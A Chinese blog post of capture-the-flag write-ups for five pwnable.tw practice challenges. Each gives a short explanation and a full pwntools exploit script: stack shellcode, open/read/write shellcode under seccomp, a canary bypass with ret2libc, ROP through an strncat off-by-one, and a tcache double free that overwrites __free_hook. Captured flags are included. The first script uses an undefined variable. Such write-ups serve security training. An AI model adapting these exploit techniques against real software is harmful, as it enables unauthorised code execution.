pwnable.tw writeup

最新推荐文章于 2021-02-18 23:04:38 发布
最新推荐文章于 2021-02-18 23:04:38 发布
阅读量4k 收藏 2
点赞数
分类专栏: Pwn CTF
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/87979196
版权
Pwn 同时被 2 个专栏收录
28 篇文章 8 订阅
订阅专栏
CTF
22 篇文章 4 订阅
订阅专栏

start

这道题是静态编译的,或者可以理解是就是直接用汇编写的,所以这个程序很小,没有可以利用的函数;

sir@sir-PC:~/desktop$ objdump -R start

start:     文件格式 elf32-i386

objdump: start:不是动态对象
objdump: start: 无效的操作

反汇编代码:

sir@sir-PC:~/desktop$ objdump -d start -M intel

start:     文件格式 elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:	54                   	push   esp
 8048061:	68 9d 80 04 08       	push   0x804809d
 8048066:	31 c0                	xor    eax,eax
 8048068:	31 db                	xor    ebx,ebx
 804806a:	31 c9                	xor    ecx,ecx
 804806c:	31 d2                	xor    edx,edx
 804806e:	68 43 54 46 3a       	push   0x3a465443
 8048073:	68 74 68 65 20       	push   0x20656874
 8048078:	68 61 72 74 20       	push   0x20747261
 804807d:	68 73 20 73 74       	push   0x74732073
 8048082:	68 4c 65 74 27       	push   0x2774654c
 8048087:	89 e1                	mov    ecx,esp
 8048089:	b2 14                	mov    dl,0x14
 804808b:	b3 01                	mov    bl,0x1
 804808d:	b0 04                	mov    al,0x4
 804808f:	cd 80                	int    0x80
 8048091:	31 db                	xor    ebx,ebx
 8048093:	b2 3c                	mov    dl,0x3c
 8048095:	b0 03                	mov    al,0x3
 8048097:	cd 80                	int    0x80
 8048099:	83 c4 14             	add    esp,0x14
 804809c:	c3                   	ret    

0804809d <_exit>:
 804809d:	5c                   	pop    esp
 804809e:	31 c0                	xor    eax,eax
 80480a0:	40                   	inc    eax
 80480a1:	cd 80                	int    0x80

可以看到程序没有什么可用函数,都靠int 0x80来执行的;
所以这里有两个关键函数:

 8048087:	89 e1                	mov    ecx,esp
 8048089:	b2 14                	mov    dl,0x14
 804808b:	b3 01                	mov    bl,0x1
 804808d:	b0 04                	mov    al,0x4
 804808f:	cd 80                	int    0x80

这段汇编相当于printf函数,会把ecx的内容打印出来,可以用来泄露地址;

 8048091:	31 db                	xor    ebx,ebx
 8048093:	b2 3c                	mov    dl,0x3c
 8048095:	b0 03                	mov    al,0x3
 8048097:	cd 80                	int    0x80

这段汇编代码,相当于gets()函数,会有溢出;
检查一下保护机制:

sir@sir-PC:~/desktop$ checksec start
[*] '/home/sir/desktop/start'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

思路

思路很简单,因为保护机制全关,所以我们可以直接将shellcode写入栈里面,然后返回到shellcode的地址,执行shellcode;
所以关键点就是泄露出栈的地址,因为汇编中有mov ecx,esp,所以可以直接泄露esp的地址,即栈的地址;

EXP

from pwn import *
p = remote('chall.pwnable.tw',10000)
#p = process('./start')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
    gdb.attach(p)
put_addr = 0x8048087 
payload = 'a'*20 + p32(put_addr)
p.recvuntil("Let's start the CTF:")
p.send(payload)
stark = u32(p.recv(4))
print "addr: " + hex(addr)
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload2 = 'a'*20 + p32(stark+0x14) + '\x90'*4 + shellcode
p.send(payload2)
p.interactive()
#FLAG{Pwn4bl3_tW_1s_y0ur_st4rt}

orw

思路

这道题考察shellcode的编写,而且我们输入的内容会被直接当成代码来执行;

 8048571:	68 c8 00 00 00       	push   0xc8
 8048576:	68 60 a0 04 08       	push   0x804a060
 804857b:	6a 00                	push   0x0
 804857d:	e8 ee fd ff ff       	call   8048370 <read@plt>
 8048582:	83 c4 10             	add    esp,0x10
 8048585:	b8 60 a0 04 08       	mov    eax,0x804a060
 804858a:	ff d0                	call   eax

但是程序有一个orw_seccomp函数,里面有prctl函数,这里限制了我们只能使用open read write这三个程序本身自带函数;

 080484cb <orw_seccomp>:
 80484cb:	55                   	push   ebp
 80484cc:	89 e5                	mov    ebp,esp
 80484ce:	57                   	push   edi
 80484cf:	56                   	push   esi
 80484d0:	53                   	push   ebx
 80484d1:	83 ec 7c             	sub    esp,0x7c
 80484d4:	65 a1 14 00 00 00    	mov    eax,gs:0x14
 80484da:	89 45 e4             	mov    DWORD PTR [ebp-0x1c],eax
 80484dd:	31 c0                	xor    eax,eax
 80484df:	8d 45 84             	lea    eax,[ebp-0x7c]
 80484e2:	bb 40 86 04 08       	mov    ebx,0x8048640
 80484e7:	ba 18 00 00 00       	mov    edx,0x18
 80484ec:	89 c7                	mov    edi,eax
 80484ee:	89 de                	mov    esi,ebx
 80484f0:	89 d1                	mov    ecx,edx
 80484f2:	f3 a5                	rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
 80484f4:	66 c7 85 7c ff ff ff 	mov    WORD PTR [ebp-0x84],0xc
 80484fb:	0c 00 
 80484fd:	8d 45 84             	lea    eax,[ebp-0x7c]
 8048500:	89 45 80             	mov    DWORD PTR [ebp-0x80],eax
 8048503:	83 ec 0c             	sub    esp,0xc
 8048506:	6a 00                	push   0x0
 8048508:	6a 00                	push   0x0
 804850a:	6a 00                	push   0x0
 804850c:	6a 01                	push   0x1
 804850e:	6a 26                	push   0x26
 8048510:	e8 9b fe ff ff       	call   80483b0 <prctl@plt>
 8048515:	83 c4 20             	add    esp,0x20
 8048518:	83 ec 04             	sub    esp,0x4
 804851b:	8d 85 7c ff ff ff    	lea    eax,[ebp-0x84]
 8048521:	50                   	push   eax
 8048522:	6a 02                	push   0x2
 8048524:	6a 16                	push   0x16
 8048526:	e8 85 fe ff ff       	call   80483b0 <prctl@plt>
 804852b:	83 c4 10             	add    esp,0x10
 804852e:	90                   	nop
 804852f:	8b 45 e4             	mov    eax,DWORD PTR [ebp-0x1c]
 8048532:	65 33 05 14 00 00 00 	xor    eax,DWORD PTR gs:0x14
 8048539:	74 05                	je     8048540 <orw_seccomp+0x75>
 804853b:	e8 50 fe ff ff       	call   8048390 <__stack_chk_fail@plt>
 8048540:	8d 65 f4             	lea    esp,[ebp-0xc]
 8048543:	5b                   	pop    ebx
 8048544:	5e                   	pop    esi
 8048545:	5f                   	pop    edi
 8048546:	5d                   	pop    ebp
 8048547:	c3                   	ret

但是我们确实只需要open read write这三个函数就可以了,只是需要我们自己写;

open_shellcode = "xor ecx,ecx;xor edx,edx;mov eax,0x5;push 0x00006761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f;mov ebx,esp;int 0x80;"
#打开文件
read_shellcode = "mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x40;int 0x80;"
#读取文件
write_shellcode = "mov eax,0x4;mov ebx,0x1;mov edx,0x40;int 0x80;"
#打印文件

EXP

from pwn import *
p = remote('chall.pwnable.tw',10001)
#p = process('./orw')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
    gdb.attach(p)
open_shellcode = "xor ecx,ecx;xor edx,edx;mov eax,0x5;push 0x00006761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f;mov ebx,esp;int 0x80;"

read_shellcode = "mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x40;int 0x80;"

write_shellcode = "mov eax,0x4;mov ebx,0x1;mov edx,0x40;int 0x80;"

shellcode = open_shellcode + read_shellcode + write_shellcode
payload = asm(shellcode)
p.recvuntil('Give my your shellcode:')
p.send(payload)
p.interactive()
#FLAG{sh3llc0ding_w1th_op3n_r34d_writ3}

或者shellcraft构造shellcode

from pwn import *
p = remote('chall.pwnable.tw',10001)
#p = process('./orw')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
    gdb.attach(p)

shellcode = ""
shellcode += shellcraft.i386.pushstr("/home/orw/flag")
shellcode += shellcraft.i386.linux.syscall("SYS_open", 'esp')
shellcode += shellcraft.i386.linux.syscall("SYS_read", 'eax', 'esp', 0x30)
shellcode += shellcraft.i386.linux.syscall("SYS_write", 1, 'esp', 0x30)

payload = asm(shellcode)
p.recvuntil('Give my your shellcode:')
p.send(payload)
p.interactive()
#FLAG{sh3llc0ding_w1th_op3n_r34d_writ3}

dubblesort

思路

排序后的数字序列仍然保存在原先栈上开辟的这段空间内,只不过数值的顺序变了;所以由于待排序数组位于栈空间内,而当前栈空间的大小是有限的,这就可以导致栈溢出;输入“+”或者“-”就可以保持栈空间里数值边,即可以使溢出时canary不变,从而绕过函数最后的canary检查,实现栈上任意位置的写入

EXP

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './du'
#p = process(name)
p = remote("chall.pwnable.tw",10101)
elf= ELF(name)
libc = ELF('./bc.so.6')
if args.G:
    gdb.attach(p)

got_off = 0x1b0000
system_off = 0x3a940
bin_sh_off = 0x158e8b

p.recvuntil('What your name :')
p.sendline('a'*24)
got_addr = u32(p.recv()[30:34])-0xa
libc_addr = got_addr-got_off
system_addr = libc_addr + system_off
bin_sh_addr = libc_addr + bin_sh_off
p.sendline('35')
p.recv()
for i in range(24):
    p.sendline('0')
    p.recv()
p.sendline('+')
p.recv()
for i in range(9):
    p.sendline(str(system_addr))
    p.recv()
p.sendline(str(bin_sh_addr))
p.recv()
p.interactive()
#FLAG{tc4ch3_1s_34sy_f0r_y0u}

Silver Bullet

函数create_bullet:

int __cdecl create_bullet(char *s)
{
  size_t v2; // ST08_4

  if ( *s )
    return puts("You have been created the Bullet !");
  printf("Give me your description of bullet :");
  read_input(s, 0x30u);
  v2 = strlen(s);
  printf("Your power is : %u\n", v2);           // s的长度
  *((_DWORD *)s + 12) = v2;                     // +12指12个dword长度
  return puts("Good luck !!");
}

Power up函数:

int __cdecl power_up(char *dest)
{
  char s; // [esp+0h] [ebp-34h]
  size_t v3; // [esp+30h] [ebp-4h]

  v3 = 0;
  memset(&s, 0, 0x30u);
  if ( !*dest )
    return puts("You need create the bullet first !");
  if ( *((_DWORD *)dest + 12) > 0x2Fu )         // *(dest+12)指针指向的值 > 47
    return puts("You can't power up any more !");
  printf("Give me your another description of bullet :");
  read_input(&s, 48 - *((_DWORD *)dest + 12));  // 限制读入长度
  strncat(dest, &s, 48 - *((_DWORD *)dest + 12)); //使用strncat连接两字符串,会自动在结尾添加\x00
  v3 = strlen(&s) + *((_DWORD *)dest + 12);
  printf("Your new power is : %u\n", v3);
  *((_DWORD *)dest + 12) = v3;
  return puts("Enjoy it !");
}

思路

strncat函数将src字符串最多前n字节添加到dest字符串的末尾(从dest原来末尾的’\x00′开始), 并在添加结束后在末尾补上一个’\x00′;所以我们可以覆盖*((_DWORD *)dest + 12这个位置,然后溢出覆盖返回地址;
覆盖的返回地址会在beat函数返回时触发;

EXP

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './Silver Bullet'
#p = process(name)
p=remote('chall.pwnable.tw', 10103)
elf= ELF(name)
libc = ELF('./libc_32.so.6')
if args.G:
   gdb.attach(p)

def creat():
   p.recvuntil('Your choice :')
   p.sendline('1')
   p.recvuntil('Give me your description of bullet :')
   p.sendline('a'*47)

def power(data):
   p.recvuntil('Your choice :')
   p.sendline('2')
   p.recvuntil('Give me your another description of bullet :')
   p.sendline(data)
   
def beat():
   p.recvuntil('Your choice :')
   p.sendline('3')
   
creat();
power('b')
main = 0x8048954
pay1 = '\xff'*7 + p32(elf.plt['puts']) + p32(main) + p32(elf.got['read']) 
power(pay1)
beat()
p.recvuntil('Oh ! You win !!\n')
read_addr = u32(p.recv(4))
libc_addr = read_addr - libc.symbols['read']
system_addr = libc_addr + libc.symbols['system']
bin_addr = libc_addr + next(libc.search('/bin/sh'))
success("libc_addr: " + hex(libc_addr))
success("system_addr: " + hex(system_addr))
success("bin_addr: " + hex(bin_addr))
creat();
power('b')
pay2 = '\xff'*7 + p32(system_addr) + p32(main) + p32(bin_addr)
power(pay2)
beat()
p.interactive()
#FLAG{uS1ng_S1lv3r_bu1l3t_7o_Pwn_th3_w0rld}

Tcache Tear

思路

有double_free漏洞,在利用的时候需要构造一个smallbin在name的位置上面,通过delete操作将libc的地址泄露出来,最后可以利用one_gadget来getshell;

EXP

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './tcache_tear'
#p = process(name)
p=remote("chall.pwnable.tw",10207)
elf= ELF(name)
libc = ELF('./bc.so.6')
if args.G:
    gdb.attach(p)
#name:0x602060
#ptr:0x602088

def add(num,data):
    p.recvuntil('Your choice :')
    p.sendline('1')
    p.recvuntil('Size:')
    p.sendline(str(num))
    p.recvuntil('Data:')
    p.sendline(data)
    
def delete():
    p.recvuntil('Your choice :')
    p.sendline('2')
    
def show():
    p.recvuntil('Your choice :')
    p.sendline('3')
    
p.recvuntil('Name:')
p.sendline('sir')

add(0x70,'a'*8)
delete()
delete()
add(0x70,p64(0x602550))
add(0x70,'bin/sh\x00')
pay1 = p64(0) + p64(0x21) + 'b'*8*2 + p64(0) + p64(0x21)
add(0x70,pay1)
#leak
add(0x60,'c'*8)
delete()
delete()
add(0x60,p64(0x602050))
add(0x60,'/bin/sh\x00')
pay2 = p64(0) + p64(0x501) + 'q'*8*5 + p64(0x602060)
add(0x60,pay2)
delete()
show()
p.recvuntil('Name :')
lib_addr = u64(p.recv(6) + '\x00\x00') - 0x3ebca0
free_hook_addr = lib_addr + 0x3ed8e8
one_gadget = lib_addr + 0x4f322 #0x4f2c5 0x10a38c
success("lib_addr: " + hex(lib_addr))
success("free_hook_addr: " + hex(free_hook_addr))
success("one_gadget: " + hex(one_gadget))

#getshell
add(0x40,'c'*8)
delete()
delete()
add(0x40,p64(free_hook_addr))
add(0x40,'/bin/sh\x00')
add(0x40,p64(one_gadget))
delete()
p.interactive()
#FLAG{tc4ch3_1s_34sy_f0r_y0u}
钞sir
关注
专栏目录
pwnable.tw-2018-starbound_writeup
CabbageWind的博客
08-17 472
题目:Pwnable.tw-starbound 解法1:ret2libc 1.进入程序进行观察: 这是一个交互小游戏,存在多处用户输入的位置,很有可能存在栈溢出漏洞。 2.查看文件保护状态: 3.使用IDA中查看文件内容: 这个文件较之平时的其他题目代码量大了很多,存在许多输入位置,但是找了一圈没有可以直接利用的栈溢出漏洞。 4.在反汇编代码中发现一个逻辑漏洞: 在用户输入时,程序只对输入值进行了strtol()处理,并把该值作为数组下标,也就是说对于输入的数字只要不为零都是可以利用p_choice
pwnable.tw orw writeup
jmp esp
09-27 1880
题目题目比较简单就不复制了,首先seccomp设置了白名单,然后输入0xc8长度shellcode,直接跳到shellcode执行。分析既然是练习,就要彻底一点。 首先是seccomp dump的问题,目前采用的方法是IDApython脚本dump数据下来,然后输入scmp_bpf_disasm。IDApython的文档非常诡异,函数没有说明,函数的参数也不能直接看出来,所以搜了很长时间找了一个别
pwnable.kr-random-Writeup
airfish20000的博客
02-08 375
MarkdownPad Document pwnable.kr-random-Writeup 与前几题套路相同,ssh远程登录,ls -l查看文件及权限,cat获得C代码如下: 1 #include 2 3 int main(){ 4 unsigned int random; 5 random = rand(); // random va
pwnable.tw start writeup
jmp esp
09-27 1470
题目.text:08048060 .text:08048060 public _start .text:08048060 _start proc near .text:08048060 push esp .text:08048061 push offset _exit .te
pwnable.tw calc writeup
jmp esp
09-27 1655
题目main:int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14, timeout); alarm(60); puts("=== Welcome to SECPROG calculator ==="); fflush(stdout); calc(); return puts
Pwnable.kr题目Writeup持续更新~
iqiqiya的博客
03-12 2261
题目地址:https://pwnable.kr/play.php 第一题[fd]: Mommy! what is a file descriptor in Linux? * try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu....
pwnable.tw unexploitable writeup
【xiaoxiaorenwu's blog】
04-07 589
花了将近一天半的时间研究这一题,因为最近在熟练srop技术,所以在看到pwnbale.kr上的那道unexploitable之后,想趁热打铁来试试这道500p的题目。收货颇丰啊~~~ 虽然看了网上的思路,但exp还是自己搞了出来,还是有点小小成就感。 题目的二进制文件和libc自己去网站上找吧pwnable.tw. 首先拿到题目我们看到没有了syscall,变为了call read,这个变化导致...
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 699
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
PWN flag [pwnable.kr]CTF writeup题解系列4
重新启程
01-01 944
直接看题目 这是一道逆向题目,直接下载下来看看 root@mypwn:/ctf/work/pwnable.kr# wget http://pwnable.kr/bin/flag --2020-01-01 09:37:31-- http://pwnable.kr/bin/flag Resolving pwnable.kr (pwnable.kr)... 128.61.240.205 ...
pwnable writeup (一)
freshfox的博客
11-02 218
collision: 源码自己找。 意思很简单,输入一个字符串,长度为20 ,4字节一组,加起来为hashcode。 前面4个 为 01010101, 最后一个为 0x1DD905E8 问题是怎么输入这个字符串。 使用python 大法。 另外注意大小字节序就可以了。 ./col `python -c 'print "\x01\x01\x01\x01\x01\x01\x...
Pwnable.tw orw [Writeup]
柷敔的博客
02-18 563
题源 https://pwnable.tw/challenge/#2 题解 先看一下安全保护情况 再IDA一下源码 其中seccomp是一个开启内核system call保护的函数。通过这一函数可以划定程序准许用户态调用的系统函数,相当于划定白名单,即题目所言【仅开启了open、write、read】。 简单分析函数可知,该程序直接执行了用户输入的shellcode。结合题目意思,可以使用open函数打开flag文件,然后read读出文件内容,最后write输出到控制台。 使用的python程序如下:
pwnable tw Death Note writeup
charlie_heng的专栏
03-01 1097
pwnable tw的题做到后面越来越骚了……脑洞太大… 这题其实是printable shellcode 一开始完全没思路,后面搜了下,发现了一个神器 https://github.com/VincentDary/PolyAsciiShellGen 能将shellcode转化为可打印字符 看了下生成的shellcode,发现其实它是利用 sub eax,xxxx 来将eax设置为任意值,...
pwnable tw Starbound writeup
charlie_heng的专栏
03-02 938
这题漏洞很明显,选择菜单的时候可以输入负数,然后可以在name那里填入想调用的函数,这样就可以实现任意地址执行 但是有了这个之后怎么用呢?? 这个就有点难度了,本来是想看一下栈,看看有没有可以用的参数,但是发现基本都用不了……. 然后想了下,这题没有给libc,又没有system,那么多半是ret2dl_resolve 那么ret2dl_resolve又需要rop,那么这题应该就是rop了...
pwnable.kr simple login writeup
lxx_nico的专栏
09-17 1250
pwnable.kr simple login writeup虽然说是pt150但是还是让我学到很多东西的。这是一个判定特定字符串的程序,直接说溢出点吧。输入的字符会经过一个base64解码,溢出点在auth的memcpy,只能够有4个字节的溢出,这么少怎么弄? 参考了大神思路。http://www.cnblogs.com/anewid/p/4567242.html 我们只能溢出4个字
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1753
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
pwnable.kr 2.collision writeup
ditto的博客
12-12 503
拿到题目 先连上去。 ls查看目录得到 cat 查看下col.c的源代码 #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;string.h&amp;gt; unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; //这里将...
pwnable.tw calc
weixin_30530339的博客
02-19 106
题目代码量比较大(对于菜鸡我来说orz),找了很久才发现一个能利用的漏洞 运行之发现是一个计算器的程序,简单测试下发现当输入的操作数超过10位时会有一个整型溢出 这里调试了一下发现是printf("%d",num[num-1])时要输出的结果超过了2^31,2147483648即0x80000000,所以这应该算是一个bug并不是一个可利用的漏洞(32位程序最大输出2^31的原因是int类型最...
pwntw start writeup 栈溢出利用自身代码
ditto的博客
12-22 669
这题利用了栈溢出,将返回地址覆盖为程序本身地址,造成内存泄露。 有个坑是如果你用gdb peda自带的checksec检查防护措施会发现NX是打开的,那么堆栈处的代码无法执行,就无法构造栈里的shellcode,file下 发现程序是静态链接的,那就无法利用ret2libc。想了半天也不知道怎么做。就用ubuntu自带的checksec检查下发现 根本没有开启NX,可能是gdb的调试环境会影响...
pwnable.tw记录之applestore
qq_35429581的博客
10-31 1440
耐下心用ida分析: 主要功能函数handler: create函数malloc一块16字节的内存,分别存放:char* name,int price,struct * bk ,struct * fd   ,由insert()函数将当前商品的结构体插入链表尾部。链表的起始位置记录在全局变量 myCart(0x0804B068)中。 delete函数进行链表的拆卸: 一开始觉
iscc2015官方writeup
最新发布
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值